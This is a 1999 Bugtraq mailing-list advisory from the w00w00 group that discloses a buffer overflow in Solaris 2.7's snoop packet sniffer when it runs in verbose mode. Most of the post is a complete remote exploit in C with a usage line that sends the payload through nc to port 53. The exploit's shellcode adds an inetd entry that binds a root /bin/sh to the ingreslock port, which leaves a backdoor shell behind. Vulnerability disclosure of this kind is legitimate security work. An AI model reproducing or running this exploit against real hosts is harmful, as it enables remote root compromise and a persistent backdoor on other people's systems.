Bugtraq mailing list archives

[w00giving #8] Solaris 2.7's snoop
From: aleph1 () UNDERGROUND ORG (Aleph One)
Date: Mon, 6 Dec 1999 22:46:12 -0800

Date: Tue, 7 Dec 1999 04:42:06 +0300 (MSK)
From: Matt Conover <shok () cannabis dataforce net>
To: news () technotronic com
cc: w00w00 () blackops org
Subject: [w00giving #8] Solaris 2.7's snoop
Message-ID: <Pine.LNX.3.95.991207044002.14801C-100000 () cannabis dataforce net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-news () technotronic com
Precedence: bulk

[Note: as we promised, our website and technotronic will get this advisory
before anything else does.  Thanks for participating in technotronic.]

w00w00 Security Development (WSD)

Discovered by: K2 (ktwo () ktwo ca)

Snoop is a program similar to tcpdump that allows one to watch network
traffic.  There is a buffer overflow in the snoop program when it is run in
verbose (-v) mode: when a domain name longer than 1024 bytes is logged, it
overwrites a fixed-size buffer in print_domain_name.  This vulnerability
allows remote access to the system with the privileges of the user who ran
snoop (usually root, because snoop requires read privileges on special
devices).

Exploit (by cheez):

   Remote Solaris 2.7 x86 snoop exploit

   Run with ( ./snp ) | nc -u target_host_network 53
   requires target host to be running "snoop -v"

   Thanks str/horizon for shellcodes (hi plaguez)

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
"\x68\x28\x2D\x63\x29 echo w00w00;"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;"
"/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00";

#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

char buffer[SIZE];
const char x86_nop=0x90;
long nop=NOPDEF, esp=0x8047344, offset=DEFOFF;

int main (int argc, char *argv[])
{
    int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));

    for (i = nop+strlen(shell); i < SIZE-4; i += 4)
        *((int *) &buffer[i]) = esp+offset;

    fprintf(stderr,"0x%x\n", esp+offset);
    printf("%s", buffer);

    return 0;
}

Because Sun Microsystems doesn't include source, we must wait for them to
release a patch.

http://www.roses-labs.com, http://www.napster.com,
http://www.technotronic.com, http://www.w00w00.org
